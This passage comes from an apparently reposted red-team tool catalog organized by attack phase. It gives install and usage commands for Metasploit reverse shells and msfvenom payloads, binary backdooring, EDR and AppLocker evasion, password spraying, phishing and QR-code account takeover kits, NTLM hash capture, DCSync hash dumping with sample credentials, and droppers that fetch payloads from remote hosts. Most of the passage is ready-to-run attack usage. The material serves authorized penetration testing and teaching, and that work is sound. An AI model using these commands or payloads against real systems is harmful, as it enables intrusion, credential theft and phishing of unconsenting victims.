supports obfuscation of payloads for AV bypass. **Set Up Listener** ``` use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run ``` #### Msfvenom Commands **PHP:** ``` msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R ``` **Windows:** ``` msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe ``` **Linux:** ``` msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf ``` **Java:** ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp ``` **HTA:** ``` msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/f8690a9996174859.png) ### [🔙](#tool-list)[Shellter](https://www.shellterproject.com/) Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only). Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan. Full README information can be found [here](https://www.shellterproject.com/Downloads/Shellter/Readme.txt). **Install: (Kali)** ``` apt-get update apt-get install shellter ``` **Install: (Windows)** Visit the [download page](https://www.shellterproject.com/download/) and install. **Usage:** Just pick a legit binary to backdoor and run Shellter. Some nice tips can be found [here](https://www.shellterproject.com/tipstricks/). Lots of community usage demos can be found [here](https://www.shellterproject.com/shellter-community-demos/). ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/a9667b6730174901.png) *Image used from https://www.kali.org/tools/shellter/images/shellter.png* ### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze) Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. **Install:** ``` git clone https://github.com/optiv/Freeze cd Freeze go build Freeze.go ``` **Usage:** ``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking) ``` ![image](https://user-images.githubusercontent.com/100603074/216729312-6e03f52-29a7-4190-8187-daecebfc6a9c.png) *Image used from https://www.blackhatethicalhacking.com/tools/freeze/* ### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal) This script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint. Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image. **Install:** ``` git clone https://github.com/0x09AL/WordSteal cd WordSteal ``` **Usage:** ``` # Generate document containing 'test.jpg' and start listener ./main.py 127.0.0.1 test.jpg 1 # Generate document containing 'test.jpg' and do not start listener ./main.py 127.0.0.1 test.jpg 0\n ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/0666f81f6b174903.png) *Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/* ### [🔙](#tool-list)[NTAPI Undocumented Functions](http://undocumented.ntinternals.net/) This site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system. It can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation. **Usage:** Visit [http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/) ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/f2d2fa3386174905.png) *Image used from http://undocumented.ntinternals.net/* ### [🔙](#tool-list)[Kernel Callback Functions](https://codemachine.com/articles/kernel_callback_functions.html) This technical note provides a comprehensive list all the APIs exported by the Windows Kernel, for driver writes to register callback routines that are invoked by kernel components under various circumstances. Most of these routines are documented in the Windows Driver Kit (WDK) but some of them are for use by in-box drivers. The undocumented functions are described briefly whereas the documented ones are just listed here for reference. **Usage:** Visit [https://codemachine.com/articles/kernel_callback_functions.html](https://codemachine.com/articles/kernel_callback_functions.html) ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/e9e43e25ef174907.png) *Image used from https://codemachine.com* ### [🔙](#tool-list)[OffensiveVBA](https://github.com/S3cur3Th1sSh1t/OffensiveVBA) A collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros. **Usage:** Visit [https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo](https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo) ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/4a2090f2fc174910.png) *Image used from https://github.com/S3cur3Th1sSh1t* ### [🔙](#tool-list)WSH **Creating payload:** ``` Set shell = WScript.CreateObject("Wscript.Shell") shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True ``` **Execute:** ``` wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted ``` ### [🔙](#tool-list)HTA **Creating payload:** ``` ``` **Execute:** Run file ### [🔙](#tool-list)VBA **Creating payload:** ``` Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub ``` **Execute:** Set function to Auto_Open() in macro enabled document # Initial Access ### [🔙](#tool-list)[CredMaster](https://github.com/knavesec/CredMaster) Launch a password spray / brute force attach via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays. CredMaster provides a method of running anonymous password sprays against endpoints in a simple, easy to use tool. The FireProx tool provides the rotating request IP, while the base of CredMaster spoofs all other identifying information. **Install:** ``` git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt ``` For full installation instructions see [here](https://whynotsecurity.com/blog/credmaster/#setup). **Usage:** ``` python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json ``` This tool requires AWS API access keys, a walkthrough on how to acquire these keys can be found here: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b ![credmaster](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/cd92557738174912.png) *Image used from https://github.com/knavesec/CredMaster/wiki* ### [🔙](#tool-list)[TREVORspray](https://github.com/blacklanternsecurity/TREVORspray) TREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more! **Install:** ``` pip install https://github.com/blacklanternsecurity/TREVORspray ``` **Usage:** ``` # Recon python3 ./trevorspray --recon evilcorp.com # Enumerate users via OneDrive python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10 # Spray against discovered python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token ``` For full usage instructions see [here](https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365). ![TREVORspray](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/bca4a44a32174914.png) *Image used from https://github.com/blacklanternsecurity/TREVORspray* ### [🔙](#tool-list)[evilqr](https://github.com/kgretzky/evilqr) Toolkit demonstrating another approach of a QRLJacking attack, allowing to perform remote account takeover, through sign-in QR code phishing. It consists of a browser extension used by the attacker to extract the sign-in QR code and a server application, which retrieves the sign-in QR codes to display them on the hosted phishing pages. Demo [video](https://www.youtube.com/watch?v=8pfodWzqMcU) **Install: (Extension)** You can load the extension in Chrome, through `Load unpacked` feature: https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked Once the extension is installed, make sure to pin its icon in Chrome's extension toolbar, so that the icon is always visible. **Install: (Server)** ``` git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat ``` **Usage:** 1. Run the server by running the built server binary: `./server/build/evilqr-server` 2. Open any of the supported websites in your Chrome browser, with installed **Evil QR** extension: ``` https://discord.com/login https://web.telegram.org/k/ https://whatsapp.com https://store.steampowered.com/login/ https://accounts.binance.com/en/login https://www.tiktok.com/login ``` 3. Make sure the sign-in QR code is visible and click the **Evil QR** extension icon in the toolbar. If the QR code is recognized, the icon should light up with colors. 4. Open the server's phishing page URL: `http://127.0.0.1:35000` (default) ![evilqr](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/984f2d0331174917.png) *Image used from https://breakdev.org/evilqr-phishing/* ### [🔙](#tool-list)[CUPP](https://github.com/Mebus/cupp) The most common form of authentication is combination of a username and a password or passphrase. Passwords can sometimes be guessed profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password. That is why CUPP was born. **Install:** ``` git clone https://github.com/Mebus/cupp;cd cupp ``` **Usage:** ``` # Run in interactive mode python3 ./cupp.py -i ``` ![cupp](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/49cfa0b1c3174920.png) *Image used from https://github.com/Mebus/cupp* ### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny) The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures. [hackinglab: Bash Bunny – Guide](https://hackinglab.cz/en/blog/bash-bunny-guide/) [Hak5 Documentation](https://docs.hak5.org/bash-bunny/) [Nice Payload Repo](https://github.com/hak5/bashbunny-payloads) [Product Page](https://hak5.org/products/bash-bunny) ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/662ea8f948174921.png) ### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish) evilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication **Install:** ``` git clone https://github.com/fin3ss3g0d/evilgophish ``` **Usage:** ``` Usage: ./setup - root domain - the root domain to be used for the campaign - subdomains - a space separated list of evilginx2 subdomains, can be one if only one - root domain bool - true or false to proxy root domain to evilginx2 - redirect url - URL to redirect unauthorized Apache requests - feed bool - true or false if you plan to use the live feed - rid replacement - replace the gophish default "rid" in phishing URLs with this value - blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/8777e71562174922.png) ### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit) This framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'. **Install:** ``` git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install ``` **Usage:** ``` python3 setoolkit ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/9edae2a13d174924.png) ### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra) Nice tool for logon brute force attacks. Can bf a number of services including SSH, FTP, TELNET, HTTP etc. **Install:** ``` sudo apt install hydra ``` **Usage:** ``` hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/cb3a0cb76d174925.png) ### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish) SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See [PhishInSuits](https://github.com/secureworks/PhishInSuits) for more about OAuth Device Code flow for phishing attacks). Attack Steps: - Send malicious QR code to victim - Victim scans QR code with mobile device - Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process) - Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer) - Attacker polls for authentication - Victim enters code into legit Microsoft website - Attacker saves authentication token **Install:** ``` git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt ``` **Note:** *Before using either module, update the required information in the settings.config file noted with `Required`.* **Usage (Email Module):** ``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging -e EMAIL, --email EMAIL victim email address to send initial QR code email to ``` **Usage (Server Module):** ``` usage: squish.py server [-h] [-c CONFIG] [--debug] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/080681e751174927.png) ### [🔙](#tool-list)[King Phisher](https://github.com/securestate/king-phisher) King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information. It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, atackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks. **Install (Linux - Client & Server):** ``` wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \ sudo bash ./install.sh ``` **Usage:** Once King Phisher has been installed please follow the [wiki page](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) to setup SSH, Database config, SMTP server etc. ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/6e7618512c174928.png) # Execution ### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder) Responder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary code execution. The LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. If a hostname cannot be resolved using these protocols, the system will broadcast a request for the hostname to the local network. Responder listens for these broadcasts and responds with a fake IP address, tricking the requesting system into sending its credentials to the attacker. **Install:** ``` git clone https://github.com/SpiderLabs/Responder#usage cd Responder ``` **Usage:** ``` # Running the tool ./Responder.py [options] # Typical usage ./Responder.py -I eth0 -wrf ``` Full usage information can be found [here](https://github.com/SpiderLabs/Responder#usage). ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/d33266516f174930.png) *Image used from https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-Responder/* ### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) A utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system. It does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as: - Password hashes for local accounts - Kerberos tickets and keys - LSA Secrets **Install:** ``` python3 -m pip install impacket ``` **Usage:** ``` # Extract NTLM hashes with local files secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL # DCSync attack and dump the NTLM hashes of all domain users. secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30 ``` ![image](https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-e33-8a712aeaf2ac.png) *Image used from https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy* ### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm) Evil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: *A service that allows administrators to remotely execute commands on a Windows machine*). Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands. Some features include: - Loading in memory Powershell scripts - Loading in memory dll files bypassing some AVs - Loading x64 payloads - Pass-the-hash support - Uploading and downloading local and remote files **Install: (Git)** ``` sudo gem install winrm winrm-fs stringio logger fileutils git clone https://github.com/Hackplayers/evil-winrm.git cd evil-winrm ``` **Install: (Ruby gem)** ``` gem install evil-winrm ``` Alternative installation instructions can be found [here](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods). **Usage:** ``` # Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' # Upload local files to victim upload local_filename upload local_filename destination_filename # Download remote files to local machine download remote_filename download remote_filename destination_filename # Execute .Net assembly into victim memory Invoke-Binary /opt/csharp/Rubeus.exe # Load DLL library into victim memory Dll-Loader -http http://10.10.10.10/SharpSploit.dll ``` Full usage documentation can be found [here](https://github.com/Hackplayers/evil-winrm#documentation). ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/7f29d0c22c174932.png) *Image used from https://korbinian-spielvogel.de/posts/heist-writeup/* ### [🔙](#tool-list)[Donut](https://github.com/TheWover/donut/) A tool for in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It can be used to load and run custom payloads on target systems without the need to drop files to disk. **Install: (Windows)** ``` git clone http://github.com/thewover/donut.git ``` To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following: ``` nmake -f Makefile.msvc ``` To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following: ``` make -f Makefile.mingw ``` **Install: (Linux)** ``` pip3 install donut-shellcode ``` **Usage:** ``` # Creating shellcode from an XSL file that pops up a calculator. shellcode = donut.create(file=r"C:\\Tools\\Source\\Repos\\donut\\calc.xsl") # Creating shellcode from an unmanaged DLL. Invokes DLLMain. shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll") ``` For full usage information, see the donut [GitHub Page](https://github.com/TheWover/donut/#4-usage). See [a recent blog post](https://thewover.github.io/Bear-Claw/) from The Wover for more info. ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/d0096fc947174934.png) ### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack) A tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming. **Install: (Binary)** 1. Get the latest binary from [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/) 2. Download binary on PC with genuine Microsoft Office installed. 3. Open console, CD to binary dir and call the binary **Install: (Git)** ``` git clone https://github.com/sevagas/macro_pack.git cd macro_pack pip3 install -r requirements.txt ``` **Usage:** ``` # Help Page python3 macro_pack.py --help # List all supported file formats macro_pack.exe --listformats # Obfuscate the vba file generated by msfvenom and puts result in a new VBA file. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba # Obfuscate Empire stager VBA file and generate a MS Word document: macro_pack.exe -f empire.vba -o -G myDoc.docm # Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe) echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm" # Execute calc.exe via Dynamic Data Exchange (DDE) attack echo calc.exe | macro_pack.exe --dde -G calc.xslx ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/75a3b99921174935.png) ### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit) A collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives. Some of the features of PowerSploit: - Dump password hashes and extract clear-text passwords from memory - Escalate privileges and bypass security controls - Execute arbitrary PowerShell code and bypass execution restrictions - Perform network reconnaissance and discovery - Generate payloads and execute exploits **Install:** *1. Save to PowerShell modules folder* First you will need to download the [PowerSploit Folder](https://github.com/PowerShellMafia/PowerSploit) and save it to your PowerShell modules folder. Your PowerShell modules folder path can be found with the following command: ``` $Env:PSModulePath ``` **Install:** *2. Install PowerSploit as a PowerShell module* You will then need to install the PowerSploit module (use the name of the downloaded folder). **Note:** *Your PowerShell execution policy might block you, to fix this run the following command.* ``` powershell.exe -ep bypass ``` Now you can install the PowerSploit module. ``` Import-Module PowerSploit ``` **Usage:** ``` Get-Command -Module PowerSploit ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/63ea2f86eb174936.png) ### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus) A tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user properties. Some of the features of Rubeus: - Kerberoasting - Golden ticket attacks - Silver ticket attacks **Install: (Download)** You can install the unofficial pre-compiled Rubeus binary [here](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe). **Install: (Compile)** Rubeus is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the rubeus [project .sln](https://github.com/GhostPack/Rubeus), choose "Release", and build. **Usage:** ``` Rubeus.exe -h ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/6f138ff412174938.png) ### [🔙](#tool-list)[SharpUp](https://github.com/GhostPack/SharpUp) A nice tool for checking a victims endpoint for vulnerabilites relating to high integrity processes, groups, hijackable paths, etc. **Install: (Download)** You can install the unofficial pre-compiled SharpUp binary [here](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe). **Install: (Compile)** SharpUp is compatible with [Visual Studio 2015 Community Edition](https://go.microsoft.com/fwlink/?LinkId=532606&clcid=0x409). Open the SharpUp [project .sln](https://github.com/GhostPack/SharpUp), choose "Release", and build. **Usage:** ``` SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership. SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable. SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership. ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/2b29e14a9c174939.png) ### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon) MS-SQL (Microsoft SQL Server) is a relational database management system developed and marketed by Microsoft. This C# MS-SQL toolkit is designed for offensive reconnaissance and post-exploitation. For detailed usage information on each technique, refer to the [wiki](https://github.com/skahwah/SQLRecon/wiki). **Install: (Binary)** You can download the latest binary release from [herehttps://github.com/skahwah/SQLRecon/releases). **Usage:** ``` # Authenticating using Windows credentials SQLRecon.exe -a Windows -s SQL01 -d master -m whoami # Authenticating using Local credentials SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami # Authenticating using Azure AD credentials SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami # Run whoami SQLRecon.exe -a Windows -s SQL01 -d master -m whoami # View databases SQLRecon.exe -a Windows -s SQL01 -d master -m databases # View tables SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019 ``` Full usage information can be found on the [wiki](https://github.com/skahwah/SQLRecon/wiki). Tool module usage information can be found [here](https://github.com/skahwah/SQLRecon#usage). ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/6d50a2cb59174941.png) *Image used from https://github.com/zhzyker/dismap* ### [🔙](#tool-list)[UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList) This resrouce is a collection of the most common and known techniques to bypass AppLocker. Since AppLocker can be configured in different ways [@api0cradle](https://github.com/api0cradle) maintains a verified list of bypasses (that works against the default AppLocker rules) and a list with possible bypass technique (depending on configuration) or claimed to be a bypass by someone. They also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs. Indexed Lists - [Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md) - [VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md) - [UnverifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/UnverifiedAppLockerBypasses.md) - [DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md) ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/5c3efa7471174942.png) *Image used from https://github.com/api0cradle/UltimateAppLockerByPassList* ### [🔙](#tool-list)[StarFighters](https://github.com/Cn33liz/StarFighters) A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host. Both Launchers run within their own embedded PowerShell Host, so we don't need PowerShell.exe. This might be usefull when a company is blocking PowerShell.exe and/or is using a Application Whitelisting solution, but does not block running JS/VBS files. **Usage:** - Setup a new Listener within PowerShell Empire - Use the Launcher command to Generate a PowerShell launcher for this listener - Copy and Replace the Base64 encoded Launcher Payload within the StarFighter JavaScript or VBScript file For the JavaScript version use the following Variable: ``` var EncodedPayload = "" ``` For the VBScript version use the following Variable: ``` Dim EncodedPayload: EncodedPayload = "" ``` - Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer. ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/8afd8327a0174944.png) *Image used from https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html* ### [🔙](#tool-list)[demiguise](https://github.com/nccgroup/demiguise) The aim of this project is to generate .html files that contain an encrypted HTA file. ```markdown The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. Further technical information [here](https://github.com/nccgroup/demiguise#how-does-it-do-it). **Install:** ``` git clone https://github.com/nccgroup/demiguise cd demiguise ``` **Usage:** ``` # Generate an encrypted .hta file that executes notepad.exe python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/a0970c4f52174945.png) *Image used from https://github.com/nccgroup/demiguise* ## [🔙](#tool-list)[PowerZure](https://github.com/hausec/PowerZure) PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources. There is zero reason to ever run PowerZure on a victim’s machine. Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure, meaning you can safely use PowerZure to interact with a victim’s cloud instance from your operating machine. **Install:** ``` Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1 ``` **Usage:** ``` # Get a list of AzureAD and Azure objects you have access to Get-AzureTarget ``` [Blog - Attacking Azure, Azure AD, and Introducing PowerZure](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/3a3942c6d7174946.png) *Image used from https://hakin9.org* # Persistence ### [🔙](#tool-list)[Impacket](https://github.com/fortra/impacket) Impacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares. It also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords. **Install:** ``` python3 -m pip install impacket ``` **Install: (With Example Scripts)** Download and extract [the package](https://github.com/fortra/impacket), then navigate to the install folder and run... ``` python3 -m pip install . ``` **Usage:** ``` # Extract NTLM hashes with local files secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL # Gets a list of the sessions opened at the remote hosts netview.py domain/user:password -target 192.168.10.2 # Retrieves the MSSQL instances names from the target host. mssqlinstance.py 192.168.1.2 # This script will gather data about the domain's users and their corresponding email addresses. GetADUsers.py domain/user:password@IP ``` Great [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) for Impacket usage. ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/6ecb110b6a174947.png) ### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire) Empire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems. Once a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system. Empire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data. **Install:** ``` git clone https://github.com/EmpireProject/Empire cd Empire sudo ./setup/install.sh ``` **Usage:** ``` # Start Empire ./empire # List live agents list agents # List live listeners list listeners ``` Nice usage [cheat sheet](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) by [HarmJoy](https://github.com/HarmJ0y). ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/745cc6205d174949.png) ### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist) A Windows persistence toolkit written in C#. The project has a [wiki](https://github.com/mandiant/SharPersist/wiki). **Install: (Binary)** You can find the most recent release [here](https://github.com/mandiant/SharPersist/releases). **Install: (Compile)** - Download the project files from the [GitHub Repo](https://github.com/mandiant/SharPersist). - Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings" - Go to "NuGet Package Manager" --> "Package Sources" - Add a package source with the URL "https://api.nuget.org/v3/index.json" - Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019. - `Install-Package Costura.Fody -Version 3.3.3` - Install the TaskScheduler package - `Install-Package TaskScheduler -Version 2.8.11` - You can now build the project yourself! **Usage:** A full list of usage examples can be found [here](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add). ``` #KeePass SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add #Registry SharPersist -t reg -c 